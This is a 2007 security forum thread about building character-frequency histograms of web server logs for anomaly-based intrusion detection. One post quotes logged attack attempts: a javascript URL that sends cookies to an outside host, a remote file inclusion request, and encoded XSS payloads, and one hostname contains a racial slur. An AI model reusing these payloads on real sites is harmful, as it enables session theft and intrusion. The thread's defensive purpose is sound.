Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Log file histograms
Posted by: Jib
Date: March 09, 2007 03:35PM

This is more on the security side of things, as opposed to the attack side of things.

I was wanting to create a program that would parse through, say, Apache log files, and create a histogram of characters passed in requests. After thinking about it for 5 minutes, I thought that surely something like this already exists.

Is anyone aware of such a script/app of this nature?

Thanks,
Jib

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

Options: ReplyQuote
Re: Log file histograms
Posted by: rsnake
Date: March 09, 2007 04:13PM

I'm not aware of that particular take on log parsing, but I have heard of a number of log parsing projects popping up. I think a number of them are pipe dreams, so there is certainly room for another one if you think you have a better take on it.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Log file histograms
Date: March 10, 2007 07:12AM

here's a sort of hacked together, slightly ad-hoc and presumptuous one if you're interested: http://sirnot.110mb.com/histogram.c (it assumes that the query string is encapsulated in quotes somewhere in the line, and it only bothers with GET and POST ones)



Edited 1 time(s). Last edit at 03/10/2007 07:13AM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Re: Log file histograms
Posted by: WhiteAcid
Date: March 10, 2007 08:15AM

Thank you so much for that code. Now I can make a histogram of my requests that return 404s, among the funny one:
Quote

1: GET /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=5606&STRMVER=4&CAPREQ=0
2: GET /%64%61%74%61%3A%69%6D%61%67%65%2F%67%69%66%3B%62%61%73%65%36%34%2CR0lGODlhUAAPAKIAAAsLav///88PD9WqsYmApmZmZtZfYmdakyH5BAQUAP8ALAAAAABQAA8AAAPbWLrc/jDKSVe4OOvNu/%209gqARDSRBHegyGMahqO4R0bQcjIQ8E4BMCQc930JluyGRmdAAcdiigMLVrApTYWy5FKM1IQe+Mp+L4rp%3Cbr%20/%3E%20hz+qIOBAUYeCY4p2tGrJZeH9y79mZsawFoaIRxF3JyiYxuHiMGb5KTkpFvZj4ZbYeCiXaOiKBwnxh4fn%3Cbr%20/%3E%20t9e3ktgZyHhrChinONs3cFAShFF2JhvCZlG5uchYNun5eedRxMAF15XEFRXgZWWdciuM8GCmdSQ84lLQ%3Cbr%20/%3EfY5R14wDB5Lyon4ubwS7jx9NcV9/j5+g4JADs
2: GET /%3c%4d%45%54%41%20%48%54%54%50%2d%45%51%55%49%56%3d%5c%22%72%65%66%72%65%73%68%5c%22%20%43%4f%4e%54%45%4e%54%3d%5c%22%30%3b%75%72%6c%3d%64%61%74%61%3a%74%65%78%74%2f%68%74%6d%6c%3b%62%61%73%65%36%34%2c%50%48%4e%6a%63%6d%6c%77%64%44%35%68%62%47%56%79%64%43%67%6e%57%46%4e%54%4a%79%6b%38%4c%33%4e%6a%63%6d%6c%77%64%44%34%4b%5c%22%3e.gif
2: GET /ILoveHavocAce
2: GET /java%20script:document.location='http://nigger.dajoob.com/x.php?x='+document.cookie
2: GET /I%20am%20a%20stupid%20moron.jpg
4: GET /asdasdasd
8: GET /side.php?go=http://donau017.server4you.de/Imagez/msn.c?

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: Log file histograms
Posted by: jungsonn
Date: March 10, 2007 06:21PM

WTF...

Options: ReplyQuote
Re: Log file histograms
Posted by: Jib
Date: March 10, 2007 06:24PM

SirNot...
that is a pretty neat script, however it's not exactly what I had in mind. I'm going to start working on it, and I'll post up again when I hit a milestone.

Thanks though!

Jib

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

Options: ReplyQuote
Re: Log file histograms
Date: March 11, 2007 09:49AM

oh. what did you have in mind, then?

Options: ReplyQuote
Re: Log file histograms
Posted by: Jib
Date: March 11, 2007 03:48PM

SirNotAppearingOnThisForum Wrote:
-------------------------------------------------------
> oh. what did you have in mind, then?


It was close, but I'm thinking histogram of each individual character, excluding filenames.

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

Options: ReplyQuote
Re: Log file histograms
Date: March 12, 2007 12:34PM

so, you mean you want something to calculate a histogram of characters in GET variable values? how would you distinguish between a file name and (for instance) a 'mod_rewritten' url (eg. /forum/t_2321.html might actually be a file or, more likely, 'rewritten' to come out as /forum.php?topic=2321)

Options: ReplyQuote
Re: Log file histograms
Posted by: Jib
Date: March 12, 2007 03:06PM

Yes, that is what I mean. I did not take mod_rewritten into account, as I am actually not looking to deploy this anywhere. I just wanted to use it in my own personal testing for theory purposes.

I think I'm going to wind up just throwing something together real quick, as I want to be able to backtrack from the characters to the word they came from, and from the word to the entire log line this word was found in.

Shouldn't be too difficult.

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

Options: ReplyQuote
Re: Log file histograms
Posted by: nEUrOO
Date: March 12, 2007 03:43PM

Okay, i like this idea of histogram... I've made a basic script to print it:
http://rgaucher.info/histo.pys

Need more work but it works and shows something like this:
X :
_ : |||||||||||||||||||
a : ||||||||||||||||||||||||||||||||||||||||||||||
c : ||||||||||||||||||||||
b : |||||||||||||||||||||||
e : |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
d : ||||||||||||||||||||||||||||||||||||||
g : ||||||||||||||||||||||||||||||||||||||||||||||||||
f : ||||||||||||||
i : |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
h : ||||||||||||||||||||||||||||||||||
k : ||||||
j : ||
m : ||||||||||||||||||||||||||||||||||||||
l : |||||||||||||||||||||||||||||||||||||||||||
o : ||||||||||||||||||||||||||||||||||||||||
n : |||||||||||||||||||||||||||||||||||||||||||
q :
p : ||||||||||||||||||||||||||||||||||||||||||||||||||||
s : ||||||||||||||||||||||||||
r : |||||||||||||||||||||||||||||||||||
u : ||||||||||||||||
t : ||||||||||||||||||||||||||||||||||||||||
w : |||||||||||||
v : ||||||||||||
y : |||||||||
x : |||||||||

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: Log file histograms
Posted by: Jib
Date: March 12, 2007 05:58PM

very cool. nEUrOO. Thanks for posting up. That is pretty close to the mental picture I had.

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

Options: ReplyQuote
Re: Log file histograms
Posted by: nEUrOO
Date: March 12, 2007 06:07PM

Do you plan to make some analysis of histogram to detect intrusions?
(such as pattern detection -- but you need the timestamp then)

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: Log file histograms
Posted by: Jib
Date: March 12, 2007 07:44PM

I do, yes. Which is why I want to be able to backtrack from character to word, and from word to log line.

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

Options: ReplyQuote
Re: Log file histograms
Posted by: jungsonn
Date: March 13, 2007 11:56AM

But...if the script can access it, my browser can also. Isn't that a little dangerous if other users can view this as well? Or am I missing some parts of the story?

Would be cool though, to write a crontab to dump logs.

Options: ReplyQuote
Re: Log file histograms
Date: March 13, 2007 04:55PM

how do you mean, exactly, 'backtrack from character to word to log line'? are you saying you want the program to keep track of which character came from which word came from which line? why not just make a histogram of words or log lines to begin with?

@neuro: your script makes a histogram of the entire query, not just the GET variables (and I wasn't entirely sure about the specifics in that either; do you, jib, want it to take variable names into account as well as values, or just their values?)

Options: ReplyQuote
Re: Log file histograms
Posted by: nEUrOO
Date: March 13, 2007 05:34PM

How I understand the backtrack is that for each character you are able to recognize from which query it is.

@Sir:
Exactly. Actually I made this because I tested this on my website where there is lots of URL rewriting... so it's useless for me to parse only the GET variable.

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 1 time(s). Last edit at 03/13/2007 07:25PM by nEUrOO.

Options: ReplyQuote
Re: Log file histograms
Posted by: Jib
Date: March 13, 2007 07:53PM

Ok, I guess I have been vague. I will try to thoroughly explain here.

My intentions of this script/series of graphs is for intrusion detection purposes. I want a graph created for each page on a site that performs form submission. Let's just say for simplicity sake, 98% of the input received from forms on your page is valid legitimate traffic. If you have a histogram of each character that was submitted, spread over enough data entries each character should on average yield around the same occurrence frequency. Therefore, when an attack attempt is made, it will contain characters not normally seen in the requests. The result... a character appearing on your histogram that is far out of frequency scope from the rest of the characters. Example... a username field which all usernames are alpha characters. your histogram (over a large enough data sample) in theory will have characters A - Z with roughly the same frequencies. Now jungsonn comes along and cleverly tries to SQL inject my username field. Well, upon reviewing my histograms I see my typical A-Z characters with their high frequencies, but _now_ I also see a few new characters appearing (such as ', ", and -) with frequencies that are drastically lower than my A-Z characters. Curiously, I click on this '-' character to show me the word in which it came from, and how often I have seen it. Results, word: "--" and frequency is just a handful of times. Hmm... this is unusual, I never see this type of activity, what has caused this? Click on word "--" and it brings me to the log lines containing sly jungsonn's attempts to thieve my site's user accounts.

Now, not only do I know illegitimate activity took place, I know exactly what it was, where it came from, and do so in just a matter of seconds from looking at a bunch of lines.

Does this make sense now?

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

Options: ReplyQuote
Re: Log file histograms
Posted by: rsnake
Date: March 14, 2007 10:20AM

It might also be nice to look at the relative length and entropy, which might also help in detection.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Log file histograms
Posted by: nEUrOO
Date: March 14, 2007 10:41AM

@RSnake:
I don't see your point for the entropy. That would make sense for password analysis, but for a URL... You could have different type of URL with different entropy (from low to high) with valid content and not only a injection string I guess. And also, it depends on the URL convention of the website.
Maybe I miss something, can you explain?

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: Log file histograms
Posted by: rsnake
Date: March 14, 2007 10:48AM

Not specifically for the URL but if you are looking at the post data (or data in a particular environmental variable) you can often get some great data. If you are expecting a number you will get really low entropy until someone puts something like an XSS attack with a relatively high entropy. See what I'm saying?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Log file histograms
Posted by: jungsonn
Date: March 14, 2007 11:33AM

Hmm I really miss the whole point here...

Why not just dump the logs with a crontab and then run a scan over it? that makes 2 crontabs; one to dump it, other to scan it. (if your planning to scan that is) And dump them in the root dir and not in the public dir or everyone can open your logs.

Options: ReplyQuote
Re: Log file histograms
Posted by: thrill
Date: March 14, 2007 11:46AM

You never want to have 2 crontabs for a 2 phase job. If phase 1 hangs, then phase 2 will perform it's duties on incomplete or bad data. Best solution is to write a script that performs both phases, and then use a crontab to call that script.

--thrill

Options: ReplyQuote
Re: Log file histograms
Posted by: jungsonn
Date: March 14, 2007 12:09PM

Don't see the problem, one dumps it, the other scans it. You know quickly if it's old data if the dates are in the past, but I surely woudn't perform two jobs at crontab, chances that it will hang are much greater cause it has to dump the data and read/scan at the same time. No, not so good idea to me. It's a matter of preference i guess.

Options: ReplyQuote
Re: Log file histograms
Posted by: nEUrOO
Date: March 14, 2007 12:10PM

@RSnake:
Okay, makes sense for me now, but then you need to study a type of data that you can bound or if you cannot bound you can describe it very well.
I was thinking with using directly the GET then try to creates rules, extract information on it.

@Jungsonn:
I think the point here is not really on how to do it, but really a new IDS technique.

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: Log file histograms
Posted by: jungsonn
Date: March 14, 2007 12:13PM

To my knowledge this isn't new at all nEUrOO. I've actually done it some 3-4 years ago. I just -like i said- dumped a .txt log file every hour with a crontab and runned another crontab which called a php script over it with a few regexes to determin weird behaviour.

Options: ReplyQuote
Re: Log file histograms
Posted by: nEUrOO
Date: March 14, 2007 12:18PM

Of course the way of gathering the information (the access log) is not new, but did you made data analysis (data-mining, prediction, etc.) and not only regexp? Because, for what I understood here, this is the point.
Well, after all, maybe i'm wrong on what Jib wants to do...

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher

Options: ReplyQuote
Re: Log file histograms
Date: March 14, 2007 02:02PM

ok, jib, I think I got you. so for each variable on each page/file/whatever you'd want to make a seperate histogram, which would show the distribution of characters and (theoretically) make it easier to discern inconsistencies. furthermore, you want each character instance to 'remember' from which value it came from on which line. all correct?

this might be sort of limited, though, as you could really only test for GET variables.



Edited 1 time(s). Last edit at 03/14/2007 02:10PM by SirNotAppearingOnThisForum.

Options: ReplyQuote
Re: Log file histograms
Posted by: Jib
Date: March 14, 2007 08:16PM

rsnake Wrote:
-------------------------------------------------------
> It might also be nice to look at the relative
> length and entropy, which might also help in
> detection.


This is an excellent idea! Thanks for that addition.

junsonn Wrote:
-------------------------------------------------------
>To my knowledge this isn't new at all nEUrOO.
> I've actually done it some 3-4 years ago. I just
> -like i said- dumped a .txt log file every hour with
> a crontab and runned another crontab which
> called a php script over it with a few regexes
> to determin weird behaviour.

For clarification, my intents with the script is not to output to a webpage. It will not be accessible aside from a user with a local account to the webserver. I never claimed for this to be a 'new idea' but nobody seems to know of anything out there that does what I am looking to accomplish. The concept behind this is called anomaly-based detection, as opposed to pattern-based detection. The uncommon characters being your anomalous behavior.

SirNotAppearingOnThisForum Wrote:
-------------------------------------------------------
> ok, jib, I think I got you. so for
> each variable on each
> page/file/whatever you'd want to
> make a seperate histogram, which
> would show the distribution of
> characters and (theoretically) make
> it easier to discern inconsistencies.
> furthermore, you want each character
> instance to 'remember' from which
> value it came from on which line. all
> correct?
>
> this might be sort of limited, though,
> as you could really only test for GET
> variables.

You are 100% on track with my train of thought. While I want it for page specific, it may also merit having site-wide statistics as well. I believe that mod_security will permit POST variables being logged in Apache. As for IIS, I'm sure there is a way to get the data, but frankly, I'm not concerned with that at this point. I would like to just put the script into action first and see if it is any bit reliable for detection.

[No sooner does man discover intelligence than he tries to involve it in his own stupidity.]
[Jaques Cousteau]

Options: ReplyQuote


Sorry, only registered users may post in this forum.